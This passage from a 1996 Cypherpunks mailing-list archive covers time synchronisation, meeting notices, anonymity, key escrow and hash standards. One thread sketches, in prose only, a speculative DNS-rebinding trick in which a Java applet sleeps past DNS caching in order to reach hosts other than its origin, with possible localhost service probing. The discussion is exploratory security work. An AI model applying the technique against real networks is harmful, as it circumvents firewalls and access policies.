distribution system due to power factor, choice of phase to use, propagation
time through transmission lines and substations and so forth would
mean that phase as observed at two distant sites was rather random
and maybe even subject to shifts over time as load conditions varied.

> What I DON'T know (and some HV transmission engineer will probably be able 
> to tell me, hint hint!) is how STABLE this phase is across the entire 
> country?  I realize that this will probably depend on who'se shipping excess 
>  power to whom at the moment, But I'd imagine the variability will be 
> distinctly limited.
> 
	I've seen some discussions about this, but don't know a reliable
answer.  I do know that the frequency is only 60 hz on the average over
a day and actually wanders up and down quite a bit more than one might
expect as load on the system varies.  I did some measurements of this 22
years ago while debugging some PDP-8E system software I wrote that that
ran a frequency counter (the ratio kind that was very accurate on low
frequencies) and found the diurnal variations surprisingly large and
quite interesting.  I've not repeated the experiment since but suspect
that they still allow the frequency to wander in response to load conditions.

> The biggest attraction of such a system is that the interface would probably 
> be trivial:  Getting it from the P/S is out because they didn't anticipate 
> such a thing.  The easiest interface might be an AC wall xformer with a 
> rectifying limiter and slicer  (Okay, maybe just a resistor and a diode, 
> possibly with the addition of a comparator for precision), driving a 
> readable pin on an otherwise-unused RS-232 interface.  (Possibly 
> installed similar to a dongle.)  Appropriate software (yucch!) would read 
> the square waves, and record the phase at any one time.  Such information 
> could be used to verify the relative synchronization between two different 
> computers, although it would be necessary to identify particular phases, as 
> I mentioned before.
> 
	One could certainly do this, but there are subtlies ... some
places and institutions generate their power locally (and few if any
users know this or know whether or not they are on the grid), UPS
systems are common and wander off of the grid during a power fail,
and many buildings have all three phases floating around wall outlets,
even wall outlets close to each other so such acts as moving plugs
around might very well change the phase.  And power systems switch
phase correction capacitors in and out from time to time as power
factor of large loads varies.  My guess is that to synchronize much
below a ms would be hard, and that random losses and jumps of sync would be
common enough to require lots of special treatment in software.

						Dave Emery  N1PRE
						die@die.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sat, 27 Jan 1996 17:24:16 +0800
To: cypherpunks-announce@toad.com
Subject: Reminder: Jan 28 Bay Area CA meeting, noon - 3 p.m.
Message-ID: <199601270845.AAA23879@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Bay Area California Cypherpunks Meeting
January 28
12 noon - 3 p.m.
B21, Sparcy's Cafeteria, Sun Microsystems Inc

Directions: 

Take the Rengstorff Ave East exit from 101.   If you're driving north
on 101, this exit is labeled "Amphitheater Parkway".     If you're driving
south on 101, this exit is labeled "Rengstorff".   At the end of the exit
ramp, turn left onto Garcia.   After .4 mile, turn right onto Marine Way.
After .1 mile, turn right onto Coast.   Building 21 is right there.  
Look for the big purple and white sign. 


Agenda:

Roger Masterton, a producer/videographer, would like to film a
discussion among cypherpunks about 1st amendment issues, for a PBS
show named "Freedom Speaks."

The show airs nationally on PBS.  In San Francisco, currently on KMPT
Thursdays at 5 p.m., and starting in March, on KQED.

Their web site is http://www.fac.org/ 

There's a lot of 1st amendment issues to talk about these days
regarding the internet, and so the first part of the meeting will
be gathering topics.   There's the first amendment principles
of publishing information in digital form, and the fundamental right
of people to carry on a private conversation.   The discussion will
take whatever organic form it takes, depending on who of us can
make the meeting ...

See you tomorrow if you're coming.  I'll bring bagels again. 

Marianne
mrm@eng.sun.com
mrm@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mrm@netcom.com (Marianne Mueller)
Date: Sat, 27 Jan 1996 17:31:11 +0800
To: cypherpunks-announce@toad.com
Subject: ahem, make that Saturday Jan 27
Message-ID: <199601270852.AAA24502@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


Turns out the darn calendar on my computer goes ahead increments
the date field sometime right round midnight.    This is what I get
for inferring today's date by glancing at the calendar manager, and
"adding 1" for tomorrow.   

The cypherpunks meeting is on Saturday Jan 27. 

Sorry about that. 

--Marianne




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve@aztech.net (Stephen P. Gibbons)
Date: Sat, 27 Jan 1996 16:32:28 +0800
To: cypherpunks@toad.com
Subject: Possible Java hack.
Message-ID: <v01510100ad2f798f0beb@[198.182.221.3]>
MIME-Version: 1.0
Content-Type: text/plain


I had a brainstorm this morning, and I think that I may have a possible
hack against Java that might circumvent a few network access policies and
the firewalls that support them.

Looking at the Java APIs it seems pretty likeley to me that when a name to
address lookup is performed, all it does is call gethostbyname() or the
equivilant.

If this is the case (and I don't have a source license at this point, or
even a system that will run Java) there is the possiblility that a sytem
with control of a web server and a DNS server could coerce a Java client
into initiating TCP connections to clients other than the system that
provided the applet (which should be a prohibited behavior, as I read the
specs.)

This is still at the WAG stage, since I don't have access to source code
and have not received confirmation (nor denial) from any of the vendors
that I have contacted, but I'd appreciate feedback (positive or negative)
from the list(s).

FWIW, my WAGs have about an 80% hit ratio, but this is the first that I've
posted without confirmation.

ObCrypto:  _When_ will DNS be secured via PKE?

--
Steve@AZTech.Net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Peponis" <mianigand@unique.outlook.net>
Date: Sat, 27 Jan 1996 14:53:54 +0800
To: cypherpunks@toad.com
Subject: Re: Open NNTP servers and logging
Message-ID: <199601270633.AAA09641@unique.outlook.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 Jan 96 at 21:11, Stephen Albert wrote:

> A little while back there were some very helpful posts about getting started
> wit open NNTP servers.  Since my regular site runs kinda slow in the news
> department I've been having fun poking around and seeing about getting more
> current.
> 
> Then it dawned on me.  People keep logs.  Presumably routine logging would
> point right back at my ISP, and from there it'd be not too hard to pin down me
> specifically.  No, I don't think anyone is particularly *likely* to do that,
> but why take chances?
> 
> So...anyone know of open NNTP servers that *don't* keep logs?  Or some other
> way around the problem?

Well, as bad as the lack of anonymity may be, NNTP server logs serve a very 
usefull purpose, ie finding and eliminating trolls and spammers.

Unfortunatly, I would have to go logs given the state of UseNet.

Why not just read from the open server, and post anonyomously using anonymous 
remailers and News-to-Mail Gateways?
Regards,
Michael Peponis
PGP Key Avalible form MIT Key Server,or via finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: postmaster@ncr-sd.SanDiegoCA.ATTGIS.COM
Date: Sat, 27 Jan 1996 18:04:26 +0800
Subject: SMTP mail failed
Message-ID: <9601270915.AB06132@toad.com>
MIME-Version: 1.0
Content-Type: message

message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sat, 27 Jan 1996 18:12:19 +0800
To: Steve Gibbons <steve@aztech.net>
Subject: Re: Possible Java hack.
In-Reply-To: <0099CFE5.860A1B00.11@aztech.net>
Message-ID: <Pine.ULT.3.91.960127013341.19154Q-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 27 Jan 1996, Steve Gibbons wrote:

> Rich,
> 
> [I've CCed this to cypherpunks, as well, I hope that you don't mind.]

Not at all, it was private only because I wasn't totally sure it wasn't a
stupid question. 

> In Article: <Pine.ULT.3.91.960127010243.19154N-100000@Networking.Stanford.EDU>, Rich Graves <llurch@networking.stanford.edu> wrote:
> # On Sat, 27 Jan 1996, Stephen P. Gibbons wrote:
> 
> # > If this is the case (and I don't have a source license at this point, or
> # > even a system that will run Java) there is the possiblility that a sytem
> # > with control of a web server and a DNS server could coerce a Java client
> # > into initiating TCP connections to clients other than the system that
> # > provided the applet (which should be a prohibited behavior, as I read the
> # > specs.)
> 
> # If I understand you correctly, this is only true if neither your stack nor
> # your client caches DNS queries. One or the other almost always does, at 
> # least for a minute, no matter how low you set TTL. 
> 
> Yes, a client that cache's DNS queries can get in the way somewhat.  I've
> already considered this, and the "devious applet" would take advantage 
> of Java's capability to use multiple threads (one of which would sleep() 
> for whatever period of time was necessary to invalidate the cache, and 
> _then_ initiate the attack.)  Yes, there are are various other specific 
> cases that need to be considered in order to make the attacking app (if 
> it's even feasable) work all of (or a good percentage of) the time.
> 
> It would be very easy to conceal the "devious" portion of the applet 
> inside of trojan horse that ran for a length of time greater than the 
> minimum TTL for DNS caching.

Which I believe you will find is platform- and even application-dependent.

If you're talking about Windows NT or 95, for example, the winsock.dll 
used by 16-bit applications caches DNS lookups in the TCP/IP stack 
itself. I think TTL is listened to.

wsock32.dll, on the other hand, doesn't do central DNS caching. So
applications implement it themselves. I'm not sure that applications even
have an opportunity to see the TTL information in the DNS response. I
doubt there's standard behavior; Netscape, HotJava, and other stuff will
probably time out DNS lookups differently. 

Real operating systems are probably a bit more standard about what they 
do with DNS lookups, but I'm sure there's variance.

Still a really interesting idea, though. My first reaction was, well who 
the hell controls a DNS server and a Web server and is likely to have a 
piece of Java that you are likely to download? And the answer is, just 
the kind of person you worry about.

This bait & switch thang can really be generalized to any kind of attack. 
Of course, it's traceable, since not that many people own or can spoof a
DNS server. 

-rich




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Sat, 27 Jan 1996 10:01:27 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601270054.BAA12525@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Jim Bell writes:

>While this would normally be my cue to offer up my "Assassination Politics"
>idea, which (if presumed to be correct) would stabilize "anarchy" and
>prevent "lawlessness and social disorder" (at least as normally seen by the
>average reader) I think that under the circumstances that would be redundant
>here.

I'm not *sure* that your Assassination Politics trip is the worst piece of tripe I've ever seen on the list, but if it's not, it's right up there.

Those of us who are anarchists are often that way because we think the *means* the State uses are evil, not to be excused by any amount of mumbo-jumbo.  And you gleefully propose to let us *all* in on the immoral game of murdering those who annoy us sufficiently.

I'll pass.

You know, if I were constructing an agent provacateur, I'd want a persona who's willing to be loudly clueless with ideas that show minimal or non-existent awareness of basic human hopes and fears, like security from random hit-squads.  I'd have him go on and on with his ideas, until eventually they can splashed all over headlines and used to discredit the whole realm of privacy protection.

But no, I don't think you're an agent.  More fool you, you're willing to do the government's disinformation work for it without even thirty pieces of silver or a 401K.

At this point I recommend to you the 12-step program I explained to Vladimir.

Signed,
A Friend







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sun, 28 Jan 1996 18:58:53 +0800
To: llurch@networking.stanford.edu
Subject: Re: Possible Java hack.
Message-ID: <0099CFE5.860A1B00.11@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


Rich,

[I've CCed this to cypherpunks, as well, I hope that you don't mind.]

In Article: <Pine.ULT.3.91.960127010243.19154N-100000@Networking.Stanford.EDU>, Rich Graves <llurch@networking.stanford.edu> wrote:
# On Sat, 27 Jan 1996, Stephen P. Gibbons wrote:

# > If this is the case (and I don't have a source license at this point, or
# > even a system that will run Java) there is the possiblility that a sytem
# > with control of a web server and a DNS server could coerce a Java client
# > into initiating TCP connections to clients other than the system that
# > provided the applet (which should be a prohibited behavior, as I read the
# > specs.)

# If I understand you correctly, this is only true if neither your stack nor
# your client caches DNS queries. One or the other almost always does, at 
# least for a minute, no matter how low you set TTL. 

Yes, a client that cache's DNS queries can get in the way somewhat.  I've
already considered this, and the "devious applet" would take advantage of Java's
capability to use multiple threads (one of which would sleep() for whatever
period of time was necessary to invalidate the cache, and _then_ initiate the
attack.)  Yes, there are are various other specific cases that need to be
considered in order to make the attacking app (if it's even feasable) work all
of (or a good percentage of) the time.

It would be very easy to conceal the "devious" portion of the applet inside of
trojan horse that ran for a length of time greater than the minimum TTL for DNS
caching.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 27 Jan 1996 10:08:18 +0800
To: cypherpunks@toad.com
Subject: weak cryptoanarchy
Message-ID: <199601270114.CAA15160@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Some non-cypherpunks seem afraid of Tim May's cryptoanarchy, 
which, to quote Dr. Denning's recent paper, "suggest the 
impending arrival of a Brave New World in which governments, as 
we know them, have crumbled, disappeared, and been replaced by 
virtual communities of individuals doing as they wish without 
interference."

Perhaps these people are worrying needlessly.  I don't think 
cryptoanarchy (in this strong form) is a likely scenario for the 
future.  Even if strong cryptography and anonymous transaction 
systems are used by everyone, governments can continue to 
control people's physical actions and properties.  The physical 
world will continue to exist, even if it becomes relatively less 
important.

I think a better prediction for the implications of strong 
crypto is what I would call "weak cryptoanarchy."  That is, 
cryptography will allow virtual communities the option to exist 
without the possibility of inteference by force.  Certainly some 
virtual communities, such as moderated discussion groups, will 
opt to have formal or informal governments.  The key is that 
people will have the choice of participating in communities 
where physical violence will be absolutely powerless.

Stated in this form, cryptoanarchy is hardly controversial.  
Plus, this weak form of cryptoanarchy has a much better chance 
of being realized, because it does not require the collapse of 
existing governments, only the creation of new communities 
without governments.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 27 Jan 1996 15:56:49 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: USPS Secure Email
In-Reply-To: <9601270226.AA18376@mhv.net>
Message-ID: <199601270740.CAA05685@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Lynne L. Harrison, Esq. writes:
> ******Begin Forwarded Message*********
> >I just read in "legal.online" that the Postal Service plans to provide
> >secure email service.  It will include encryption plus offer U.S. mail fraud
> >protection.  Of course there is no estimate on cost.

The latest issue of "legal.online" that's actually online appears to be July
1995. I rooted around on www.usps.gov but there's not much there. Does
someone have a pointer to soft- or hardcopy of the actual proposal? Anyone
know how they plan to do digital postage?

Futplex <futplex@pseudonym.com>
Looks like jim bell will soon prompt me to try to crank up procmail again....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQnW0ynaAKQPVHDZAQHF7wf/brK8Ca4drdogJuznOIKox/BIi2rv45LP
KarbnYRyYmJcPrlUkedtV4EUK9W7W02JWHQF+LKvJHfEpWYjqmCx/jPiJBdf00zC
q+cUKOnEvml1BAOy9Ab/TfIRxa79wZg7K7IajSm2lAOtf9M+3pSMaLpb5jNxxzf/
pyPYnXsj9hIX0Jp3fNaGjvSUDO3Iu5SEoxmT98uQ+7tXZvQ98toy7EgBY/RFl6b9
c/ShSuhxxsPl/SBMHjbpH/gaxr2IaINN+HU/ncopF7a/dx0Osm1cOxBixac2QHf2
QH5uqUc560BzCpb6FTjsUZtx0PGOrDF44sbXsrNJRWPGjU1V3p6t0g==
=g2dN
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 27 Jan 1996 19:40:34 +0800
To: die@die.com
Subject: Re: NOISE NOISE NOISE - clocks and other irrelevance
Message-ID: <m0tg8TO-0008yOC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:40 AM 1/27/96 -0500, Dave Emery wrote:
>
>> 
>> A peripheral I've long wanted to see, commonly available:  ACCURATE  time, 
>> broadcast to the millisecond/microsecond/nanosecond, available from sources 
>> as varied as TV VIR's, FM subcarriers, and other sources, available as an 
>> easy input (via a peripheral card) to a computer.
>
>	The only technology that I'd trust to be useful much below
>10-100 ms is GPS.   The others are unlikely to be controlled well enough
>at the source to be trusted. 

What about Loran?  WWV(B)?  Receptor-type signals?

Now, I agree that CURRENTLY few people "depend" on those other (non-GPS, 
non-Loran, non-WWVB) systems, but to some extent that's a "chicken and egg 
problem"  

> Current TV broadcasting, for example,
>usually involves multiple passes though digital frame stores and time
>base correctors  - most homes get the signal via cable which itself
>involves significant uncontrolled delays  (juat the thermal changes
>in propagation delay  in a long CATV cable and amplifier chain due to weather
>changes run into the many microseconds).

Perhaps, but I'm assuming broadcast tv.  Single source.  Limited variability 
in path length.  I admit there  are limitations; my argument is that the 
signals SHOULD contain accurately-defined points, even if it is only one per 
frame.


>	And humans beings being as imperfect as they are, it is hard to
>beleive that making sure that the time being broadcast is really kept accurate
>is going to be a priority when most people use it for purposes that require
>plus or minus a few seconds timing.

I think that if there WERE some reliably-available timecode system, plus a 
cheap single-chip system to drive it, it WOULD be kept reliable enough 
because of demand.


>> I have a 12-year-old Heathkit "Most Accurate Clock" that I assembled myself, 
>> and had the foresight to install it with its computer  interface option. 
>> (receives 5, 10, or 15 MHz signals broadcast from Boulder, Colorado, 
>> containing "exact" time.) 
>> 
>> While I've never taken the time to connect it to my PC, it provides 
>> (through an RS232 jack) correct time with a rated accuracy of about 5 
>> milliseconds, as I vaguely recall. (Even has a dipswitch setup on the bottom 
>> to tell it how many 500 mile increments you are away from WWVB... corrects 
>> for delay to a first order of magnitude.)
>> 
>	WWVB is the 60 khz broadcast (which is more accurate due to more
>stable propagation) 

Not much of a difference, given the context.  For example, I'm probably 1000
miles away from Boulder; it is highly unlikely that the path length
differences for the HF bands could exceed about 100 miles, or about 0.5
millisecond.  Given the context, it's accurate enough for anti-spoofing work
in networks.


. the  HF ones are WWV.  Commercial time receivers
>are available that work off the 60 khz time code (very narrow bandwidth
>ASK), but the 60 khz is most used as a standard frequency for long
>term tracking of error in local standards.

Any more?  I don't think so.  GPS has probably pretty much taken over as the
"gold standard" for clock synchronization, I suspect.  Path length is known,
by definition, and the resolution must (as a consequence of the distance
accuracy requirements) be in the low-nanosecond level.



>> (BTW, if anybody knows how to easily connect it to the pc, or has the 
>> appropriate software, please tell me  The task isn't difficult from a 
>> hardware standpoint; it's just RS-232 serial ASCII timecode at about 9600
>> bps which 
>> either continuously retransmits or on request.  The problem is the software:
>
>	If you run unix

Nope.

> there are some quite sophisticated programs that
>can use this specific clock (connected to a serial port) that allow sync
>to the full accuracy possible at good times of day (around 1 ms).   The
>programs also allow time distribution to other computers on a network -
>thus their name  - ntp - which stands for network time protocol (and the
>network time program that implements it). This protocol and the various unix
>programs that implement it are quite widely used on commercial LANs and
>the Internet to sychronize time amoung unix workstations, servers, and
>bridges and routers.  Current implementations are capable of tracking
>clock oscillator error on a system and adjusting the time periodically
>to compensate for the frequency error of the clock and even to predict
>(polynomial approximation) the change in frequency error with time.
>
>	The man behind much of this (at least the early research) is
>Dave Mills who used to be at louie.udel.edu which hosted a ftp
>site for the programs.   An archie search will reveal where they
>are kept now, and there is a newsgroup (comp.protocols.time.ntp) for this
>which no doubt has a substantial faq file about this. 

Thanks for the reference.

	

>> (Then again, there are those "Receptor" watches which have (at least)
similar 
>> accuracy, which as I understand it work on FM subcarrier principles.)
>
>	Yes they use the RDS broadcast on the 57 khz subcarrier for this.
>Of course there is no certainty the station has the clock set accurately.

Chicken and egg, again.  I assume that any radio station can afford $300 for
a GPS receiver that can put out time accurate to 1 microsecond.  If enough
people start USING such broadcasts, they will be considered NECESSARY and
will be maintained.  The Receptor watch is an excellent interest-developing
product to assist in this problem; the only problem might be that errors of
greater than the 5 msec spec'd are not necessarily immediately apparent to
the common watch-on-wrist user.

>
>	TV stations could be made to maintain a local clock sync'd to
>GPS and use that to do the final level of clocking out before feeding
>the transmitter and could thus ensure that some reference point in some
>frame happened at an exact time, but given that a user who can see a TV
>signal can probably see GPS signals and can do the same timekeeping himself
>for a couple hundred bucks it hardly seems worth it any more.  I do
>expect that time codes with modest accuracy (few tens of ms at best)
>will become common as part of the Starsite (or whatever they call it
>now) program guide distribution on PBS, simply because this has defined
>a format that can conveniantly contain time messages multiplexed with
>other data and the box displays the time.  DSS and VC-II both also have
>this capability, but of course the uncertainty of the satellite delay
>limits accuracy and neither has provisions for providing time to other
>devices.




>	This is possible, but I bet the variations in phase in the local
>distribution system due to power factor, choice of phase to use, propagation
>time through transmission lines and substations and so forth would
>mean that phase as observed at two distant sites was rather random
>and maybe even subject to shifts over time as load conditions varied.

I'm hoping some HV engineer will make a comment as to this factor.

>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Sat, 27 Jan 1996 18:37:36 +0800
To: llurch@networking.stanford.edu
Subject: Re: Possible Java hack.
Message-ID: <0099CFED.982523E0.1@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <Pine.ULT.3.91.960127013341.19154Q-100000@Networking.Stanford.EDU>, Rich Graves <llurch@networking.stanford.edu> wrote:
# > [I've CCed this to cypherpunks, as well, I hope that you don't mind.]

# Not at all, it was private only because I wasn't totally sure it wasn't a
# stupid question. 

Not at all.  I'm worried about similar respnses to my original post given my
instable base.  :)

# > It would be very easy to conceal the "devious" portion of the applet 
# > inside of trojan horse that ran for a length of time greater than the 
# > minimum TTL for DNS caching.

# Which I believe you will find is platform- and even application-dependent.

I don't pretend to understand how every system on the market works, especially
those that have "PC" somewhere in their offficial or onufficial name.

# If you're talking about Windows NT or 95, for example, the winsock.dll 
# used by 16-bit applications caches DNS lookups in the TCP/IP stack 
# itself. I think TTL is listened to.

[See the caveat above.]

# wsock32.dll, on the other hand, doesn't do central DNS caching. So
# applications implement it themselves. I'm not sure that applications even
# have an opportunity to see the TTL information in the DNS response. I
# doubt there's standard behavior; Netscape, HotJava, and other stuff will
# probably time out DNS lookups differently. 

The thing to remember, with Java is that it's "platform independant" and thus
the security of Java as a whole will be the product of its parts.

# Real operating systems are probably a bit more standard about what they 
# do with DNS lookups, but I'm sure there's variance.

There is.  Actually its "real OS's" that I worry about most.  If you run
idenmtd, it might be possible for a java applet to determine who invoked it.
If fingerd (or any other service) allows and responds to connections from
127.0.0.1 (ie. localhost...)

# Still a really interesting idea, though. My first reaction was, well who 
# the hell controls a DNS server and a Web server and is likely to have a 
# piece of Java that you are likely to download? And the answer is, just 
# the kind of person you worry about.

I didn't state it explicitly, but that's exactly my point.

# This bait & switch thang can really be generalized to any kind of attack. 
# Of course, it's traceable, since not that many people own or can spoof a
# DNS server. 

Traceable by what?  If my assumptions are correct (which I'm willing to admit
that they might not be) all the attacker has to spoof is name to address for a
name that he/she already controls.  I don't expect that most PCs and/or
Macintosh's do this as a matter of course.  Most firewalls probably do, but I
wouldn't count on it.

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Sat, 27 Jan 1996 17:27:13 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Denning's misleading statements
In-Reply-To: <m0tg2xB-0008zgC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960127034520.15214B-100000@volt.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 26 Jan 1996, jim bell wrote:

> I'm not saying we should somehow try to prevent people from developing truly 
> voluntary key-escrow systems; rather, I'm saying that their existence should 
> alert us to the danger.

True - and while the administration/FBI and their pawns at NIST (most of 
which are ex-NSA) recognize they can't force total key escrow right now, 
they are working on a FIPS to ensure that all government software 
purchases include government key escrow, to try to tilt the marketplace 
towards this idea.  

>From the various Key Escrow meetings I've gone to, the main people who 
said they want voluntary escrow was mainly banking concerns, and they 
certainly wanted it in safe hands, not in the hands of the government.  
Infact no one from industry was concerned about "immediate key escrow" 
for tapping phone lines (except for this crazy guy from IBM).  Key escrow 
was only seen as useful in terms of data recovery.

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 27 Jan 1996 19:44:57 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: SHA-2
In-Reply-To: <DLCCvL.482@news2.new-york.net>
Message-ID: <199601271126.GAA15032@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Rob writes:
> I don't know if the revision is official or proposed. I first heard
> about it in a post to alt.security (I saved the message somewhere)
> which contained ref's in the federal register.  I've seen other
> implementations that make the same fix.
> 
> The difference that when the expansion function is performed, it rolls
> the dword 1 bit left before putting it in the W[] array.

Any particular reason someone called this SHA-2 ?  It sounds a whole lot like
the revision of the original SHA, called SHA-1, that came out quite a while
ago. (FIPS 180-1)  This is rather old hat unless they're making a _second_
revision to the standard, in which case I expect there would have been much
more noise made about it.

Futplex <futplex@pseudonym.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQoL0inaAKQPVHDZAQGzmQf9FLDvD9TmpMfgDDac0xHsJX8RspJ/tIfS
yMU6eoVSclD1hdQzMxkSc1ffPxvrLvCzILeFZVzZ/4duAp2wn1q4GPnQRvjXh98V
GXVhHusiyB4RFWOsUewXt7r4aYtPeIZI51WEnRMXanCjcVU2ChukiruLAEQqC1JS
nInfVMNjNkb1IHrltnwznnfqY91xBRzrABI1s8dRFXU/jUAI+jGr3ThfMipowvwh
egbBkrhQJjlS3J9f2XL0rte0NDO5WxL5MrdR/N54ODI9ktrhWXWrAeK/NbA4tm6I
uLrHq8FiI6HhqbrO7cEMMU2cuODv3Yu/0Z/MyD03C/uO1D0m1m1VRg==
=zI2p
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 27 Jan 1996 21:18:02 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Microsoft's CryptoAPI - thoughts?
In-Reply-To: <199601270550.VAA23195@mailx.best.com>
Message-ID: <199601271259.HAA18857@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

James A. Donald writes:
> http://www.jim.com/jamesd/mscryptoapi.html

Thank you :)

> A notable misfeature of the API is that it assumes that in general 
> you will have two key pairs.  One for signing and one for encrypting.
> 
> Since in the most common case you are encrypting something related to a
> signed message by the person you are encrypting to this is a
> bad idea, 

Could you elaborate ?  I haven't heard of any known interaction
effects between a strong encryption algorithm and a distinct strong digital
signature algorithm (with or without distinct keys), although such an effect
is certainly conceivable. 

Using "bare" RSA for both encryption and signing, problems can of course arise 
because signing with a private key amounts to decrypting the plaintext to be
signed with that key. Thus you can be tricked into decrypting some
ciphertext by signing it. But this is the sort of problem addressed by the 
crypto object format standards like PKCS. No-one recommends using "bare" RSA.

Actually, using separate keys for signing and encrypting is another way to
avoid this issue.

> and protocols that require two key pairs to avoid protocol
> failure are hazardous and inconvenient.  I think Microsoft should 
> not have chosen to support such protocols.

(I disagree)

Futplex <futplex@pseudonym.com>
It takes a budget of billions to hold us back....

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMQohiCnaAKQPVHDZAQEV4gf/ajSPD+CvXFo5R8i4PNxVy+e82IwBCn4l
2ea16MlCNDGnThA1ZAxJRK+x7df4ysCzDz/Ke0frSZeOE+0/xz1rnEEkyC7ZJ7JF
1+9RAqkyZ6LAlYrUEGbXxWvhwxm1X8aJUz4HpVOZxihjzaxlW7UaBZiStaAlv4SN
You+EQd/LS00w345lIjCPGfZUPk9GJjpxFzlU6DPp6a+TLQ1hdvAy7qebdTpqdKm
uZJnyaTQI0Irz483YqoXLr8gg7kA6JvEFj/UGo3Udt+tNB+I/BlMsNgL/Jm3FbxW
JJ9WjjmjM/7Fu4Fx6jvpu7F923hCFk5ZqrrNjStwniwWbLl8GMGZ2w==
=zFg1
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Sun, 28 Jan 1996 00:26:20 +0800
To: Jay Holovacs <hallam@w3.org
Subject: Re: "Gentlemen do not read each other's mail"
Message-ID: <199601271610.IAA26122@mailx.best.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:39 PM 1/25/96 -0500, Jay Holovacs wrote:
>I might suppose that a significant reason why the nuclear arms race did 
>not come to blows was the balance of espionage between NSA/CIA/KGB etc. 
>With accurate information on your enemy, one is less likely to be 
>panicked into a preemtive strike.

On the other hand, with inaccurate information concerning enemy
capabilities and will, one is more likely to believe that the
enemy is incapable of destroying you from the grave, or lacks the
necessary will to destroy the world in response to a small
"surgical" nuclear strike.

They called it the peace of fear, the peace of terror, and the pax
atomica.  They did not call it the peace of the NSA
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sun, 28 Jan 1996 22:25:53 +0800
To: cypherpunks@toad.com
Subject: Re: "This post is G-Rated"
Message-ID: <2.2.32.19960127133024.0098f658@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:42 AM 1/26/96 -0800, Bill Frantz wrote:
>I think you have a very different view of rating than I do.  For example, I
>would be comfortable rating all the Sesame Street shows for sex and
>violence without seeing any more than I have seen, just based on the
>reputation of the show's producers.  Based on reviews in the newspaper
>(since the net has replaced TV for me), most of the current network shows
>can also be rated for all their episodes.  Remember also, there is an
>"unrated" catagory.  Some people will refuse to access unrated material. 
>Others, (I suspect you and I) may seek it out.
>

That's fine for "brand name" shows but who's going to rate the 50 years of
home movies Fred C. Schwartz has lovingly digitized and put up on *his* server.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 27 Jan 1996 22:23:34 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: "Gentlemen do not read each other's mail"
In-Reply-To: <199601251947.OAA16586@jekyll.piermont.com>
Message-ID: <Pine.SUN.3.91.960127090407.8008E-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 25 Jan 1996, Perry E. Metzger wrote:

> 
